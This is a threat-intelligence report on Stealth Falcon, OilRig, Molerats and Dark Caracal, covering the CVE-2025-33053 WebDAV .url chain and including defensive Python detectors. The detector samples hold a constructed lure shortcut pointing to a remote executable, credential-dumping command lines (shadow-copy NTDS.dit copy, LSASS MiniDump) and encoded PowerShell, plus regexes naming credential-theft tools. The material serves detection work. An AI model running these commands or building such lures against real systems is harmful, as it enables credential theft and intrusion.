Stealth Falcon’s Zero-Day Offensive, OilRig’s Supply Chain Escalation, and the Evolving Middle Eastern APT Landscape
(Have feedback? Did something resonate with you? Did something annoy you? Just hit reply! :))
Get questions like this:
- what do you know about Stealth Falcon ?
- Are there known overlaps or connections between Stealth Falcon and other regional or global threat actors in terms of infrastructure or TTPs?
Does it take chunks out of your day? Would you like help with the research?
This baseline report was thoughtfully researched and took 10 minutes. It's meant to be a rough draft for you to enhance with the unique insights that make you an invaluable analyst.
We just did the initial grunt work.
Are you ready to level up your skillset? Get Started Here!
Did this help you? Forward it to a friend!
TL;DR
Key Points
- Stealth Falcon is actively exploiting Microsoft zero-day CVE-2025-33053 in targeted spear-phishing campaigns against defense organizations in Turkey and the Middle East.
  - Immediate patching and advanced monitoring for WebDAV and LOLBin activity are critical for defense and government sectors.
- OilRig (APT34) is expanding supply chain and destructive ransomware operations, leveraging a diverse malware arsenal and long-term persistence techniques.
  - Organizations must enhance credential security, monitor for PowerShell and credential dumping, and implement rigorous supply chain risk management.
- Molerats and affiliates (APT-C-23/Arid Viper) continue targeted espionage against Israeli and Palestinian entities using geopolitical lures and RATs.
  - Regular spear-phishing simulations and endpoint detection focused on RAT activity are recommended.
- Dark Caracal persists in fileless malware and phishing campaigns aligned with Lebanese intelligence objectives.
  - Deploy EDR solutions with behavioral analytics to detect fileless and stealthy malware.
- Overlaps in TTPs, infrastructure, and malware among these APTs suggest possible indirect collaboration or competition, complicating attribution and defense.
  - Enhanced regional and international threat intelligence sharing is essential for timely detection and coordinated response.
Executive Summary
Stealth Falcon, OilRig, Molerats, and Dark Caracal represent the most active and sophisticated Middle Eastern APT groups, each aligned with state or political interests and employing advanced tactics for espionage, surveillance, and disruption. Stealth Falcon’s recent exploitation of CVE-2025-33053 via spear-phishing and multi-stage loaders (Horus Loader/Agent) underscores the urgency of rapid patching and advanced detection, especially in defense and government sectors. OilRig’s evolution toward supply chain compromise, destructive malware, and persistent credential theft (using tools like Mimikatz, LaZagne, and LIONTAIL) highlights the need for robust credential monitoring and supply chain security.
Molerats and affiliates maintain persistent espionage against Israeli and Palestinian targets, leveraging RATs and geopolitical lures, while Dark Caracal continues fileless malware campaigns targeting government and private sectors. The groups’ shared use of spear-phishing, PowerShell, credential dumping, and evasion techniques (code virtualization, LOLBins, fileless malware) demands a multi-layered defense: advanced EDR, user training, and continuous threat intelligence sharing.
Strategically, these APTs exacerbate regional tensions, complicate diplomatic relations, and threaten critical infrastructure. The forecast anticipates further zero-day exploitation, supply chain targeting, and operational shifts driven by geopolitical developments. Technical teams should prioritize patch management, behavioral analytics, and collaborative intelligence frameworks to mitigate these evolving threats.
Research & Attribution
Historical Context
Stealth Falcon is a UAE-linked advanced persistent threat (APT) group active since at least 2012, targeting Emirati journalists, activists, dissidents, and government and defense sectors in the Middle East and Africa. The group is known for sophisticated tactics, including spear-phishing, zero-day exploits, and custom malware such as the Horus Agent built on the Mythic C2 framework. Recent campaigns have leveraged a Microsoft zero-day vulnerability (CVE-2025-33053) to target high-profile defense organizations in Turkey and other Middle Eastern countries.
OilRig (APT34) is an Iranian state-sponsored cyber espionage group active since at least 2014. It targets government, energy, telecommunications, finance, and critical infrastructure sectors primarily in the Middle East but also globally. OilRig is known for spear-phishing, supply chain attacks, and a diverse malware arsenal including BONDUPDATER, Helminth, ISMAgent, and LIONTAIL. The group has conducted destructive ransomware and wiper attacks, notably against Albania in 2022.
Molerats is an Arabic-speaking, politically motivated threat group linked to Hamas and Palestinian interests, active since 2012. It targets Israeli and Middle Eastern government, military, media, and NGO sectors using spear-phishing with geopolitical and military-themed lures. Molerats is closely affiliated with APT-C-23 (Arid Viper), sharing infrastructure and malware.
Dark Caracal is attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. It targets government and private organizations across multiple countries, employing phishing and fileless malware techniques aligned with Lebanese intelligence objectives.
Timeline
- 2012: Stealth Falcon, Molerats, and Dark Caracal begin operations.
- 2014: OilRig (APT34) emerges as an Iranian state-sponsored group.
- 2016: Citizen Lab reports on Stealth Falcon targeting UAE dissidents.
- 2022: OilRig is linked to destructive ransomware and wiper attacks against Albania.
- 2022-2025: Dark Caracal continues phishing and fileless malware campaigns targeting government and private sectors.
- 2023: OilRig executes long-term intrusions against Middle Eastern government entities using PowerShell backdoors and custom loaders.
- 2023-2025: Molerats and affiliates maintain cyber espionage campaigns targeting Israeli and Palestinian entities.
- 2025: Stealth Falcon exploits the then-unpatched WebDAV vulnerability CVE-2025-33053 against a defense organization in Turkey (March); Check Point publishes its analysis and Microsoft ships the fix in the June 2025 security update.
Origin
Stealth Falcon is linked to the UAE government, conducting state-sponsored espionage. OilRig is attributed to Iran’s Ministry of Intelligence and Security (MOIS). Molerats is associated with Hamas and Palestinian interests. Dark Caracal is linked to Lebanese state intelligence.
Countries Targeted
- United Arab Emirates – Stealth Falcon targets dissidents, journalists, and government sectors.
- Turkey – Recent Stealth Falcon campaigns targeted defense organizations.
- Israel – Molerats and affiliates focus on government, military, and civil society.
- Lebanon – Dark Caracal targets government and private sectors.
- Middle Eastern and African countries – Stealth Falcon and OilRig conduct espionage campaigns.
Sectors Targeted
- Government – All groups target government entities for intelligence gathering.
- Defense and Military – Stealth Falcon, OilRig, and Molerats focus on defense sectors.
- Telecommunications – OilRig targets telecom infrastructure.
- Media and Activists – Stealth Falcon targets journalists and activists.
- Finance and Energy – OilRig targets financial and energy sectors.
Motivation
Stealth Falcon’s motivation is state-sponsored espionage to monitor dissent, gather intelligence on regional adversaries, and protect UAE national security. OilRig aims to advance Iranian geopolitical influence, destabilize rivals, and collect intelligence. Molerats pursues Palestinian political and military objectives aligned with Hamas. Dark Caracal serves Lebanese intelligence goals.
Attack Types
Stealth Falcon uses spear-phishing, zero-day exploits (notably CVE-2025-33053), WebDAV abuse, living-off-the-land binaries (LOLBins), a custom multi-stage loader (Horus Loader), and a custom implant (Horus Agent). OilRig employs spear-phishing, supply chain attacks, advanced malware families, DNS and HTTP C2 channels, credential dumping, and destructive ransomware/wiper malware. Molerats relies on spear-phishing with geopolitical lures and custom malware. Dark Caracal uses phishing, fileless malware, and social engineering.
Notable Recent Campaigns and Technical Details
Stealth Falcon
- In March 2025, Stealth Falcon exploited a zero-day Windows vulnerability (CVE-2025-33053) to target a major defense organization in Turkey. The attack used a deceptive .url file that triggered malware hosted on a WebDAV server, abusing legitimate Windows tools to execute code silently.
- The infection chain involved a multi-stage loader called Horus Loader, which uses code virtualization and anti-analysis techniques to evade detection.
- The final payload was Horus Agent, a custom-built implant for the Mythic C2 framework, designed for stealth, anti-analysis, and selective payload deployment.
- The group also uses custom post-exploitation tools including a credential dumper that extracts Active Directory credentials from virtual disk copies, a passive backdoor, and a keylogger.
- Infection vectors include spear-phishing emails with archive attachments containing .url or .lnk files that leverage WebDAV and LOLBins for payload delivery.
- Domains used in campaigns are often older, legitimate domains repurposed to evade detection.
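The .url delivery described above is a file-format problem that a triage script can catch before detonation. The following Python is an added example written for this report (it is not Check Point's or the report's own code, and it does not reproduce the campaign sample): it parses the [InternetShortcut] section of a .url file and flags a target, working directory, or icon that resolves to a WebDAV share or to a remote executable. The sample shortcuts, the hosts, and the local tool name are constructed; the WebDAV path syntax (\\host@80\..., \\host@SSL@443\..., \\host\DavWWWRoot\...) is Windows' own redirector convention.

```python
"""Triage Windows Internet Shortcut (.url) files for WebDAV-hosted targets.

Added example, not code from the report or from the vendors it cites. A .url
file is an INI-style text file; when opened, Windows launches whatever the URL=
key names, using WorkingDirectory= as the current directory. The heuristics
below flag shortcuts whose target, working directory, or icon resolve to a
WebDAV share (Windows redirector syntax \\\\host@80\\..., \\\\host@SSL@443\\...,
\\\\host\\DavWWWRoot\\...) or to a remote executable. Every sample below is
constructed; hosts use documentation ranges and .test names.
"""
import configparser
import re

# Extensions Windows runs or re-dispatches when they are the shortcut target.
# Analyst's list, not a Windows-defined one; ".com" is left out so that
# https://example.com does not match.
EXEC_EXT = re.compile(r"(?i)\.(exe|dll|scr|bat|cmd|ps1|hta|js|jse|vbs|vbe|wsf|msi|lnk|url)(?=[?#]|$)")
UNC = re.compile(r"^\\\\([^\\/\s]+)\\(.*)$")
WEBDAV_HOST = re.compile(r"(?i)@ssl$|@\d{1,5}$")  # host@SSL, host@80, host@SSL@443


def normalize(value: str) -> str:
    """Strip quotes and a file: scheme, and fold forward slashes so UNC checks apply."""
    v = value.strip().strip('"')
    if v.lower().startswith("file:"):
        v = v[5:].replace("/", "\\")
    return v


def is_webdav_unc(path: str) -> bool:
    """True for UNC paths that force the WebClient (WebDAV) redirector."""
    m = UNC.match(path)
    if not m:
        return False
    host, rest = m.groups()
    return bool(WEBDAV_HOST.search(host) or re.match(r"(?i)davwwwroot(?:\\|$)", rest))


def is_remote(path: str) -> bool:
    """UNC path or http(s) URL: anything the shortcut would fetch over the network."""
    return path.startswith("\\\\") or re.match(r"(?i)https?://", path) is not None


def triage_url_shortcut(text: str) -> dict:
    """Parse one .url file and return a verdict, findings, and the normalized fields."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    except configparser.Error as exc:
        return {"verdict": "malformed", "findings": [f"parse error: {exc}"], "fields": {}}
    if not cp.has_section("InternetShortcut"):
        return {"verdict": "malformed", "findings": ["no [InternetShortcut] section"], "fields": {}}
    sec = cp["InternetShortcut"]  # configparser lower-cases option names
    fields = {k: normalize(sec.get(k, "")) for k in ("url", "workingdirectory", "iconfile")}
    url, wd, icon = fields["url"], fields["workingdirectory"], fields["iconfile"]
    findings = []
    if is_webdav_unc(url):
        findings.append("URL targets a WebDAV share")
    elif is_remote(url) and EXEC_EXT.search(url):
        findings.append("URL targets a remote executable or script")
    if is_webdav_unc(wd):
        note = "WorkingDirectory on a WebDAV share"
        if url and not is_remote(url):
            # Local program, remote CWD: relative paths the program (or its
            # children) resolve are looked up on the attacker's server.
            note += " while URL is a local program"
        findings.append(note)
    if is_remote(icon):
        findings.append("IconFile on a remote host (fetched when the file is merely displayed)")
    return {"verdict": "suspicious" if findings else "benign", "findings": findings, "fields": fields}


# Constructed samples (not real campaign artifacts).
SAMPLES = {
    "webdav_lure": (
        "[InternetShortcut]\n"
        "URL=file://192.0.2.10@80/DavWWWRoot/agenda/Conference_Agenda.pdf.exe\n"
        "IconIndex=1\n"
    ),
    "local_tool_remote_cwd": (
        "[InternetShortcut]\n"
        "URL=C:\\Windows\\System32\\placeholder-tool.exe\n"  # placeholder, not a specific LOLBin
        "WorkingDirectory=\\\\files.example.test@SSL@443\\DavWWWRoot\\share\n"
    ),
    "benign": (
        "[InternetShortcut]\n"
        "URL=https://www.example.com/\n"
        "IconFile=C:\\Windows\\System32\\SHELL32.dll\n"
        "IconIndex=13\n"
    ),
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        result = triage_url_shortcut(body)
        print(f"{name}: {result['verdict']} {result['findings']}")
```

Run it over shortcuts extracted from archive attachments at the mail gateway or in the sandbox. A WebDAV working directory paired with a local program as the target is the shape of the CVE-2025-33053 chain; a remote IconFile means the shortcut can trigger an outbound fetch as soon as Explorer renders the icon, before anyone double-clicks.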
OilRig (APT34)
- OilRig has conducted extensive spear-phishing campaigns with tailored lures, including LinkedIn phishing masquerading as trusted entities.
- The group exploits vulnerabilities such as CVE-2017-11882 (Microsoft Office) and CVE-2019-0604 (Microsoft SharePoint).
- OilRig uses a diverse malware arsenal including BONDUPDATER, Helminth backdoor, ISMAgent, ISMDoor, LaZagne, Mimikatz, PICKPOCKET credential stealer, and ZeroCleare destructive malware.
- The group employs DNS tunneling, HTTP communications, scheduled tasks, macros, and PowerShell scripts for persistence and stealth.
- In 2023, OilRig conducted an eight-month-long intrusion against undisclosed Middle Eastern government entities, deploying PowerShell backdoors and keyloggers, and using the LIONTAIL framework for custom loaders and memory-resident shellcode.
- OilRig has also been linked to destructive ransomware and wiper attacks, notably against Albania in 2022.
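DNS tunneling, listed above as one of OilRig's C2 and exfiltration channels, is detectable from resolver logs alone, because a tunnel has to push its data through the subdomain labels. The Python below is an added example (not OilRig tooling, and not taken from the report or its sources): it groups queries by domain and scores each on unique-subdomain ratio, label length, character entropy, and TXT/NULL usage. The log format and every hostname are constructed; grouping on the last two labels and the numeric thresholds are assumptions to be tuned against a real resolver's logs.

```python
"""Score DNS query logs for tunneling-style C2 (long, high-entropy, ever-changing subdomains).

Added example, not from the report or any vendor it cites. Input is a constructed
flat log, one query per line: "<ts> <client> <qname> <qtype>". Queries are grouped
by their last two labels as a stand-in for the registrable domain; a real
deployment would use the Public Suffix List so that names under co.uk and the
like group correctly. Thresholds are starting points, not vendor-tuned values.
"""
import hashlib
import math
from collections import defaultdict

RARE_QTYPES = {"TXT", "NULL"}  # record types that carry bulk data in tunnels


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's own symbol distribution."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str):
    """Return (subdomain or None, 'registrable' domain) using the last two labels."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None, ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_line(line: str):
    parts = line.split()
    if len(parts) < 4:
        return None
    return {"ts": parts[0], "client": parts[1], "qname": parts[2], "qtype": parts[3].upper()}


def score_domains(lines, min_queries: int = 20) -> dict:
    """Aggregate per domain and label each as 'tunnel-like' or 'normal'."""
    agg = defaultdict(lambda: {"queries": 0, "subs": set(), "sub_chars": 0,
                               "entropy_sum": 0.0, "rare_qtype": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        sub, dom = split_qname(rec["qname"])
        d = agg[dom]
        d["queries"] += 1
        if sub is not None:
            d["subs"].add(sub)
            d["sub_chars"] += len(sub)
            d["entropy_sum"] += shannon_entropy(sub.replace(".", ""))
        if rec["qtype"] in RARE_QTYPES:
            d["rare_qtype"] += 1

    report = {}
    for dom, d in agg.items():
        q = d["queries"]
        metrics = {
            "queries": q,
            "unique_subdomain_ratio": round(len(d["subs"]) / q, 3),
            "avg_subdomain_len": round(d["sub_chars"] / q, 1),
            "avg_entropy": round(d["entropy_sum"] / q, 2),
            "rare_qtype_ratio": round(d["rare_qtype"] / q, 3),
        }
        hits = sum([
            metrics["unique_subdomain_ratio"] > 0.8,  # almost every query is a new name
            metrics["avg_subdomain_len"] > 30,         # labels sized to carry payload
            metrics["avg_entropy"] > 3.5,              # encoded data, not words
            metrics["rare_qtype_ratio"] > 0.5,         # TXT/NULL used as the data channel
        ])
        metrics["indicators"] = hits
        metrics["verdict"] = "tunnel-like" if hits >= 3 and q >= min_queries else "normal"
        report[dom] = metrics
    return report


def constructed_log() -> list:
    """Constructed sample: ordinary corporate lookups plus a TXT-based tunnel."""
    lines = []
    for i in range(30):  # benign: a handful of stable names
        sub = ("www", "mail", "autodiscover")[i % 3]
        lines.append(f"2025-06-10T09:{i:02d}:00Z 10.0.0.{5 + i % 3} {sub}.example.com {'A' if i % 2 else 'AAAA'}")
    for i in range(40):  # tunnel: hex chunk + sequence number, one TXT query each
        chunk = hashlib.sha256(f"exfil-chunk-{i}".encode()).hexdigest()[:48]
        lines.append(f"2025-06-10T10:{i:02d}:00Z 10.0.0.7 {chunk}.{i}.c2.example.test TXT")
    for i in range(5):  # too few queries to judge
        lines.append(f"2025-06-10T11:{i:02d}:00Z 10.0.0.8 static.example.net A")
    return lines


if __name__ == "__main__":
    for dom, m in sorted(score_domains(constructed_log()).items()):
        print(f"{dom:16} {m['verdict']:12} {m}")
```

Requiring three of four indicators keeps CDN and telemetry domains with hashed-but-stable hostnames out of the alert queue; the minimum query count avoids scoring a domain on a single odd lookup. Feed it a day of resolver logs per client rather than the whole estate so that one infected host cannot be averaged away by everyone else's traffic to the same domain.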
Molerats and Affiliates (APT-C-23 / Arid Viper)
- Molerats uses spear-phishing with political and military-themed lures targeting Israeli and Palestinian entities.
- The group deploys a range of malware including BlackShades, BrowserPasswordDump10, DarkComet, SPARK RAT, and Quasar RAT.
- Affiliates like Arid Viper have targeted Israeli government offices, military organizations, and academic institutions since at least 2012.
- Recent campaigns include surveillance of Israeli officials and Palestinian political opposition, with infrastructure actively maintained as of late 2023.
Dark Caracal
- Dark Caracal employs phishing emails with malicious PDF attachments and fileless malware techniques.
- The group targets government and private organizations across multiple countries, focusing on intelligence gathering aligned with Lebanese state interests.
- Operations have been ongoing since at least 2012, with continued activity reported through 2024.
Links to Other APT Groups
- No confirmed direct links between Stealth Falcon and other regional APT groups exist in open-source reporting.
- Some overlaps in TTPs, infrastructure reuse, and malware families suggest possible indirect relationships or shared operational methods, especially among Middle Eastern espionage groups.
- OilRig is linked to subgroups such as Greenbug and has operational overlaps with other Iranian-aligned groups like APT33 and FOX Kitten.
- Molerats is closely affiliated with APT-C-23 (Arid Viper), sharing infrastructure and malware.
- Speculative discussions exist about coordination or rivalry among these groups, but concrete evidence remains limited.
MITRE ATT&CK Techniques (Selected Examples)
Stealth Falcon (G0038)
- Spearphishing Attachment (T1566.001)
- Spearphishing Link (T1566.002)
- User Execution (T1204)
- Exploitation for Client Execution (T1203): the CVE-2025-33053 chain fires when the user opens the .url lure, not by exploiting an exposed network service.
- Command and Scripting Interpreter: PowerShell (T1059.001)
- OS Credential Dumping (T1003)
- Process Injection (T1055)
- File and Directory Discovery (T1083)
- Data from Local System (T1005)
- Exfiltration Over C2 Channel (T1041)
- Obfuscated Files or Information (T1027)
- Scheduled Task/Job (T1053.005)
OilRig (G0049)
- Spearphishing Attachment (T1566.001)
- Spearphishing Link (T1566.002)
- User Execution (T1204)
- Scheduled Task/Job (T1053.005)
- Exfiltration Over Alternative Protocol (T1048)
- Data from Local System (T1005)
- OS Credential Dumping (T1003)
- Command and Scripting Interpreter: PowerShell (T1059.001)
- Remote Services: Remote Desktop Protocol (T1021.001)
- Masquerading (T1036)
- Network Service Discovery (T1046)
- Supply Chain Compromise (T1195)
Molerats (G0021)
- Spearphishing Attachment (T1566.001)
- Command and Scripting Interpreter: PowerShell (T1059.001)
- OS Credential Dumping (T1003)
- Data Staged (T1074)
- Exfiltration Over C2 Channel (T1041)
Dark Caracal (G0070)
- Spearphishing Attachment (T1566.001)
- Phishing (T1566)
- Process Injection (T1055), used for fileless, in-memory payload execution
- Command and Scripting Interpreter (T1059)
- Data from Local System (T1005)
- Exfiltration Over C2 Channel (T1041)
Breaches Involving This Threat Actor
- Beyond the March 2025 intrusion at a Turkish defense organization reported by Check Point, no publicly confirmed major breaches attributed to Stealth Falcon in the past 2-3 years were found in open-source news.
- Stealth Falcon’s recent campaigns focus on espionage and targeted surveillance rather than disruptive breaches.
- OilRig has been linked to destructive ransomware and wiper attacks, including a notable campaign against the Albanian government in 2022.
- Molerats and Dark Caracal primarily conduct espionage and surveillance with no publicly disclosed major breaches.
Strategic Implications
The activities of Stealth Falcon, OilRig, Molerats, and Dark Caracal have significant implications for regional stability, diplomatic relations, and national security in the Middle East and beyond.
- Regional Stability: These groups contribute to ongoing cyber espionage and influence operations that exacerbate tensions among Middle Eastern states. Stealth Falcon’s targeting of dissidents and regional adversaries supports UAE’s strategic interests but raises concerns about repression and surveillance. OilRig’s operations align with Iran’s efforts to assert regional dominance and destabilize rivals, including through destructive cyberattacks. Molerats and Dark Caracal’s activities reflect the cyber dimension of the Israeli-Palestinian conflict and Lebanese state interests, respectively.
- Diplomatic Relations: Cyber operations by these groups complicate diplomatic engagements, as states accuse each other of sponsoring or harboring cyber espionage actors. The use of cyber tools for political repression and intelligence gathering undermines trust and fuels geopolitical rivalries. For example, Stealth Falcon’s targeting of activists and journalists has drawn international criticism, while OilRig’s destructive campaigns have heightened tensions with Gulf states and Western allies.
- National Security Interests: The targeting of government, defense, telecommunications, and critical infrastructure sectors by these groups poses direct threats to national security. The use of zero-day exploits and advanced malware by Stealth Falcon and OilRig demonstrates their capability to penetrate high-value networks, potentially enabling espionage, sabotage, or influence operations. The persistence and sophistication of these actors require robust cybersecurity defenses and intelligence sharing among affected nations.
- Geopolitical Developments: Recent normalization agreements and shifting alliances in the Middle East may influence the operational focus of these groups. For instance, Stealth Falcon’s campaigns may intensify against perceived adversaries as regional alignments evolve. Similarly, Iran-aligned groups like OilRig may adjust targeting in response to diplomatic pressures or conflicts. The cyber domain remains a critical front in the broader geopolitical contest for influence and security.
- Recommendations for Decision-Makers: Strategic decision-makers should prioritize enhanced cyber threat intelligence sharing, invest in advanced detection and response capabilities, and engage in diplomatic efforts to establish norms and deterrence mechanisms in cyberspace. Understanding the evolving tactics and motivations of these regional threat actors is essential for mitigating risks and safeguarding national interests.
Recommendations, Actions and Next Steps
Recommendations
- For defense and government sectors in the Middle East and Africa, immediately prioritize patching CVE-2025-33053, the WebDAV vulnerability exploited by Stealth Falcon, using Microsoft’s June 2025 security update. Apply the patch within 48 hours to mitigate risk from active exploitation campaigns targeting high-value defense organizations, particularly in Turkey and the wider Middle East. Where hosts have no business need for WebDAV, disable the WebClient service as well: the .url chain depends on the Windows WebDAV redirector resolving the attacker’s share, and blocking outbound WebDAV at the perimeter removes that dependency for the rest.
- Conduct quarterly spear-phishing simulation exercises tailored to sector-specific threat profiles (government, defense, telecom, finance, energy) to improve user awareness against sophisticated social engineering tactics, such as archive attachments with .url or .lnk files and LinkedIn phishing campaigns used by Stealth Falcon and OilRig.
- Deploy advanced endpoint detection and response (EDR) tools capable of detecting multi-stage loaders, code virtualization, and anti-analysis techniques (e.g., Horus Loader, LIONTAIL framework). Focus on monitoring for living-off-the-land binaries (LOLBins) abuse and PowerShell script execution, which are common in these groups’ campaigns.
- Enhance credential security by implementing continuous monitoring for credential dumping activities, particularly targeting Active Directory environments. Deploy tools to detect extraction from virtual disk copies and the use of credential stealers like Mimikatz and LaZagne, frequently employed by Stealth Falcon and OilRig.
- Establish or strengthen regional and international cyber threat intelligence sharing platforms focused on Middle Eastern APT groups. Facilitate timely exchange of indicators of compromise (IOCs), TTP updates, and coordinated incident response to counter espionage and destructive campaigns by Stealth Falcon, OilRig, Molerats, and Dark Caracal.
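The monitoring asked for in the EDR and credential-security recommendations above can be expressed as a handful of process-creation rules. The Python below is an added example, not vendor detection content and not taken from the report or its sources: it runs four heuristics (execution from a WebDAV share, shadow-copy extraction of NTDS.dit and the SYSTEM hive, LSASS dumping and known credential tools, encoded or downloading PowerShell) over constructed events shaped like EDR or Sysmon process-creation records. Hostnames, PIDs, and the placeholder tool name are invented for illustration; the rules describe the common shape of these techniques, not any one group’s tooling.

```python
"""Flag process-creation events for the behaviours this report asks defenders to
monitor: tools launched from WebDAV shares, credential extraction from volume
shadow copies and LSASS, and encoded or downloading PowerShell.

Added example, not from the report or from any vendor it cites. Events are
constructed dictionaries shaped like an EDR or Sysmon Event ID 1 record (image,
command line, working directory, parent); the rules are analyst heuristics, not
a reproduction of any group's tooling. Hosts use .test names.
"""
import re
from collections import Counter

# Windows WebDAV redirector syntax: \\host@80\..., \\host@SSL\..., \\host@SSL@443\..., \\host\DavWWWRoot\...
WEBDAV_PATH = re.compile(r"(?i)\\\\[^\\\s]+(?:@ssl\\|(?:@ssl)?@\d{1,5}\\)|\\\\[^\\\s]+\\davwwwroot\\")


def r_webdav(ev):
    """Image, command line or working directory on a WebDAV share (the .url/LOLBin chain)."""
    return any(WEBDAV_PATH.search(ev.get(k, "")) for k in ("image", "cmdline", "cwd"))


def r_ntds(ev):
    """Shadow copy created, or NTDS.dit / SYSTEM hive read out of one (offline AD credential theft)."""
    c = ev["cmdline"]
    return bool(re.search(r"(?i)\bvssadmin\b.*\bcreate\s+shadow", c)
                or re.search(r"(?i)\bntdsutil\b.*(\bifm\b|ac\s+i\s+ntds)", c)
                or re.search(r"(?i)harddiskvolumeshadowcopy\d+\\.*(ntds\.dit|\\config\\system\b)", c))


def r_lsass(ev):
    """LSASS minidump via comsvcs.dll or procdump, or a known credential-dumping tool on the command line."""
    return bool(re.search(r"(?i)comsvcs\.dll.*minidump|procdump.*\blsass\b|sekurlsa|mimikatz|lazagne", ev["cmdline"]))


def r_powershell(ev):
    """PowerShell with an encoded command or an in-memory download/execute primitive."""
    if not re.search(r"(?i)\bpowershell(\.exe)?\b", ev["image"] + " " + ev["cmdline"]):
        return False
    return bool(re.search(r"(?i)\s-(e|ec|enc|encodedcommand)\s|downloadstring|invoke-expression|\biex\b|frombase64string",
                          ev["cmdline"]))


RULES = [
    ("R1", "high", "execution from a WebDAV share", r_webdav),
    ("R2", "high", "NTDS.dit / SYSTEM hive extraction via volume shadow copy", r_ntds),
    ("R3", "critical", "LSASS dump or credential-dumping tool", r_lsass),
    ("R4", "medium", "encoded or downloading PowerShell", r_powershell),
]


def detect(events) -> list:
    """Run every rule over every event; one alert per (event, rule) hit, in input order."""
    alerts = []
    for ev in events:
        for rule_id, severity, title, match in RULES:
            if match(ev):
                alerts.append({"rule": rule_id, "severity": severity, "title": title,
                               "pid": ev["pid"], "image": ev["image"]})
    return alerts


def summarize(alerts) -> dict:
    """Alert counts by severity, for a quick triage view."""
    return dict(Counter(a["severity"] for a in alerts))


# Constructed events (not real telemetry). The local tool is a placeholder
# name, not a specific LOLBin.
EVENTS = [
    {"pid": 4012, "ppid": 3300, "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\placeholder-tool.exe", "cmdline": "placeholder-tool.exe",
     "cwd": "\\\\files.example.test@SSL@443\\DavWWWRoot\\share"},
    {"pid": 4100, "ppid": 4012, "parent_image": "C:\\Windows\\System32\\placeholder-tool.exe",
     "image": "\\\\files.example.test@SSL@443\\DavWWWRoot\\share\\stage2.exe", "cmdline": "stage2.exe",
     "cwd": "\\\\files.example.test@SSL@443\\DavWWWRoot\\share"},
    {"pid": 5120, "ppid": 5100, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\vssadmin.exe", "cmdline": "vssadmin create shadow /for=C:",
     "cwd": "C:\\Windows\\system32"},
    {"pid": 5130, "ppid": 5100, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy3\\Windows\\NTDS\\ntds.dit C:\\Users\\Public\\n.dit",
     "cwd": "C:\\Windows\\system32"},
    {"pid": 5200, "ppid": 5100, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 712 C:\\Users\\Public\\l.dmp full",
     "cwd": "C:\\Windows\\system32"},
    {"pid": 5300, "ppid": 2200, "parent_image": "C:\\Windows\\System32\\wscript.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
     "cwd": "C:\\Users\\jdoe"},
    {"pid": 6000, "ppid": 800, "parent_image": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs -p",
     "cwd": "C:\\Windows\\system32"},
]

if __name__ == "__main__":
    found = detect(EVENTS)
    for a in found:
        print(f"{a['rule']} [{a['severity']}] pid={a['pid']} {a['title']}: {a['image']}")
    print(summarize(found))
```

The working-directory check in R1 matters more than the image check: in the local-program-with-remote-CWD shape, the image is a trusted signed binary and only the current directory gives the chain away, so the telemetry source has to record it. R2 will also fire on legitimate backup jobs that snapshot a domain controller; scope it to interactive parents (cmd.exe, powershell.exe, wscript.exe) or allow-list the backup agent before putting it in production.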
MITRE ATT&CK IDs
T1566.001, T1566.002, T1204, T1203, T1059.001, T1003, T1055, T1041, T1027, T1053.005, T1195
Suggested Pivots
- Given Stealth Falcon’s recent exploitation of CVE-2025-33053, what are the detailed characteristics of the exploit chain, including delivery mechanisms (e.g., spear-phishing with .url/.lnk files, WebDAV abuse), and how have their TTPs evolved over the past 12 months? Prioritizing this will help technical teams develop targeted detection and mitigation strategies against the most current and sophisticated attack vectors.
- What specific operational overlaps exist between Stealth Falcon, OilRig, Molerats, and Dark Caracal in malware infrastructure, code reuse, and C2 frameworks, and how might these overlaps indicate potential collaboration or competition? Understanding this can prioritize intelligence sharing and attribution efforts, especially where shared tools or infrastructure could signal broader threat actor networks.
- How effective are current regional and international cyber threat intelligence sharing platforms in detecting and responding to these groups’ espionage and destructive campaigns, and what gaps exist in real-time information exchange? This question is critical to improving collective defense capabilities and reducing response times to emerging threats.
- How do the use of living-off-the-land binaries (LOLBins), fileless malware, and advanced evasion techniques by these groups impact the efficacy of existing endpoint detection and response (EDR) systems, and what emerging technologies (e.g., AI-driven behavioral analytics) could enhance detection and response? This research will inform investment and development priorities for cybersecurity defenses.
- In light of recent geopolitical shifts and normalization agreements in the Middle East, how might the targeting priorities, operational tempo, and strategic objectives of Stealth Falcon and OilRig evolve over the next 12 to 24 months? This question helps anticipate future threat landscapes and align strategic cybersecurity planning with geopolitical developments.
Forecast
Short-Term Forecast (3-6 months)
- Stealth Falcon’s Exploitation of CVE-2025-33053 Will Drive Immediate Patch Deployment and Enhanced Detection in Defense and Government Sectors
  - The active exploitation of Microsoft zero-day CVE-2025-33053 by Stealth Falcon against high-value defense organizations in Turkey and the Middle East requires urgent patching and improved detection. The chain is delivered by spear-phishing with archive attachments containing .url/.lnk files; once the recipient opens the shortcut, it abuses WebDAV and legitimate Windows tools to run the multi-stage Horus Loader with no further prompts, increasing the risk of undetected intrusions and data exfiltration.
